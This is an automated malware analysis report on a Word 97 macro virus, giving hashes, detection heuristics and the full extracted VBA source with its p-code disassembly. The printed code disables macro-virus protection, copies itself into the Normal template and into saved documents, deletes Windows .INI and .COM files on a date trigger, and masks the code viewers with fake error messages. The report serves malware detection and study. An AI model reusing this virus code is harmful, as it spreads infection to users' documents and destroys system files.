Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c241257df28d3084…

MALICIOUS

Office (OLE)

Size: 47.0 KB | Created: 1998-07-25 19:17:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: c317d7b7610256498f91624e7365d0f3
SHA-1: a4ff0701c7fa2cbfc19fe5bd338120c12cb27f74
SHA-256: c241257df28d308457245f9a5f0708e7afda247e262396eeec07189b559760e7
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains a VBA macro that attempts to export itself to 'C:\ThisDoc.log' and then import it into the Normal template. This action is designed to infect the user's Normal template, allowing the macro to spread to other documents opened by the user. The presence of 'Document_Open' and 'FileSaveAs' macros, along with legacy WordBasic markers, indicates a macro-based infection attempt.

Heuristics (5)

  • ClamAV: Doc.Trojan.ZMK-8 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.ZMK-8
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    Options.VirusProtection = False
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    Private Sub Document_Open()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 9409 bytes
SHA-256: b1ecd3ce5596cf444525de059227c9e952747834ccf763179e768501f10ed1bf
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorDO
Dim Fichier$
Fichier$ = Dir("C:\ThisDoc.log")
If Fichier$ <> "ThisDoc.log" Then
    Application.VBE.ActiveVBProject.VBComponents("ThisDocument").Export FileName:="C:\ThisDoc.log"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile FileName:="C:\ThisDoc.log"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 5
    MsgBox "Attention, ThisDocument est infecté...", vbInformation, "Virus ThisDoc"
End If
ErrorDO:
End Sub
Sub FileSaveAs()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
    Dialogs(wdDialogFileSaveAs).Show
    If ActiveDocument.SaveFormat = wdFormatTemplate Or ActiveDocument.SaveFormat = wdFormatDocument Then
        ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
    End If
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile FileName:="C:\ThisDoc.log"
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.DeleteLines 1, 5
MsgBox "Je suis une Nouvelle Génération de Virus de Macro...", vbInformation, "Virus ThisDoc"
ErrorFSA:
End Sub
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAE
Dim MyDate, MyTime
MyDate = Date
MyTime = Time
D$ = Mid(MyDate, 1, 2)
If D$ = "15" Then
    MsgBox "ZeMacroKiller98 est heureux de vous présenter sa nouvelle création...", vbInformation, "Virus ThisDoc"
End If
T$ = Mid(MyTime, 1, 2)
If T$ = D$ Then
    MsgBox "Vos données vont être détruites...", vbCritical, "Virus ThisDoc"
    Kill "C:\Windows\*.INI"
    Kill "C:\Windows\*.COM"
End If
ErrorAE:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTM
    MsgBox "Erreur Système" & Chr$(13) & "Veuillez réessayer plus tard", vbInformation, "Microsoft Word"
ErrorTM:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
    MsgBox "Ce programme a réalisé une opération illégale et va être interrompu.", vbCritical, "Microsoft Word"
ErrorVVBC:
End Sub

' Processing file: /tmp/qstore_59y3cmzc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15500 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #3:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #6:
' 	OnError ErrorDO 
' Line #7:
' 	Dim 
' 	VarDefn Fichier
' Line #8:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ArgsLd Dir 0x0001 
' 	St Fichier$ 
' Line #9:
' 	Ld Fichier$ 
' 	LitStr 0x000B "ThisDoc.log"
' 	Ne 
' 	IfBlock 
' Line #10:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ParamNamed FileName 
' 	LitStr 0x000C "ThisDocument"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #11:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ParamNamed FileName 
' 	LitStr 0x000C "ThisDocument"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #12:
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	LitStr 0x000C "ThisDocument"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #13:
' 	LitStr 0x0026 "Attention, ThisDocument est infecté..."
' 	Ld vbInformation 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #14:
' 	EndIfBlock 
' Line #15:
' 	Label ErrorDO 
' Line #16:
' 	EndSub 
' Line #17:
' 	FuncDefn (Sub FileSaveAs())
' Line #18:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #19:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #20:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #22:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #23:
' 	OnError ErrorFSA 
' Line #24:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #25:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #26:
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #27:
' 	EndIfBlock 
' Line #28:
' 	LitStr 0x000E "C:\ThisDoc.log"
' 	ParamNamed FileName 
' 	LitStr 0x000C "ThisDocument"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #29:
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	LitStr 0x000C "ThisDocument"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #30:
' 	LitStr 0x0034 "Je suis une Nouvelle Génération de Virus de Macro..."
' 	Ld vbInformation 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #31:
' 	Label ErrorFSA 
' Line #32:
' 	EndSub 
' Line #33:
' 	FuncDefn (Sub AutoExec())
' Line #34:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #35:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #36:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #37:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #38:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #39:
' 	OnError ErrorAE 
' Line #40:
' 	Dim 
' 	VarDefn MyDate
' 	VarDefn MyTime
' Line #41:
' 	Ld Date 
' 	St MyDate 
' Line #42:
' 	Ld Time 
' 	St MyTime 
' Line #43:
' 	Ld MyDate 
' 	LitDI2 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	St D$ 
' Line #44:
' 	Ld D$ 
' 	LitStr 0x0002 "15"
' 	Eq 
' 	IfBlock 
' Line #45:
' 	LitStr 0x0045 "ZeMacroKiller98 est heureux de vous présenter sa nouvelle création..."
' 	Ld vbInformation 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #46:
' 	EndIfBlock 
' Line #47:
' 	Ld MyTime 
' 	LitDI2 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	St T$ 
' Line #48:
' 	Ld T$ 
' 	Ld D$ 
' 	Eq 
' 	IfBlock 
' Line #49:
' 	LitStr 0x0022 "Vos données vont être détruites..."
' 	Ld vbCritical 
' 	LitStr 0x000D "Virus ThisDoc"
' 	ArgsCall MsgBox 0x0003 
' Line #50:
' 	LitStr 0x0010 "C:\Windows\*.INI"
' 	ArgsCall Kill 0x0001 
' Line #51:
' 	LitStr 0x0010 "C:\Windows\*.COM"
' 	ArgsCall Kill 0x0001 
' Line #52:
' 	EndIfBlock 
' Line #53:
' 	Label ErrorAE 
' Line #54:
' 	EndSub 
' Line #55:
' 	FuncDefn (Sub ToolsMacro())
' Line #56:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #57:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #58:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #59:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #60:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #61:
' 	OnError ErrorTM 
' Line #62:
' 	LitStr 0x000E "Erreur Système"
' 	LitDI2 0x000D 
' 	ArgsLd Chr$ 0x0001 
' 	Concat 
' 	LitStr 0x001C "Veuillez réessayer plus tard"
' 	Concat 
' 	Ld vbInformation 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #63:
' 	Label ErrorTM 
' Line #64:
' 	EndSub 
' Line #65:
' 	FuncDefn (Sub ViewVBCode())
' Line #66:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #67:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #68:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #69:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #70:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #71:
' 	OnError ErrorVVBC 
' Line #72:
' 	LitStr 0x0044 "Ce programme a réalisé une opération illégale et va être interrompu."
' 	Ld vbCritical 
' 	LitStr 0x000E "Microsoft Word"
' 	ArgsCall MsgBox 0x0003 
' Line #73:
' 	Label ErrorVVBC 
' Line #74:
' 	EndSub